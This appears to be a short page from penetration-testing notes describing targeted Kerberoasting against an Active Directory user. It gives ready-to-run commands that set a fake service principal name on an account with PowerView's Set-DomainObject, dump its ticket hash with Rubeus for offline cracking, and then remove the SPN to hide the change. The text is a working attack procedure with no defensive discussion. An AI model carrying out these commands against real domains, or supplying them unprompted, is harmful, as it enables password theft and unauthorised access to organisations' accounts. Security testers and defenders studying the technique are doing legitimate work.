Targeted Kerberoasting

If we have a lot of rights over user, we could make it vulnerable to Kerberoasting by MAKING her a service account so we can steal and crack hash. So Create SPN -> Steal&Crack Hash -> Delete SPN.

Creating Fake SPN's

PS C:\> Set-DomainObject -Credential $Cred -Identity rmyers -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

Kerberoasting via Rubeus

Rubeus is only as example, obviously you can use whatever you want.

PS C:\> .\Rubeus.exe kerberoast /user:rmyers /nowrap

Removing the Fake SPN

PS C:\> Set-DomainObject -Credential $Cred -Identity rmyers -Clear serviceprincipalname -Verbose

PreviousSemi-Manual Way NextASREProasting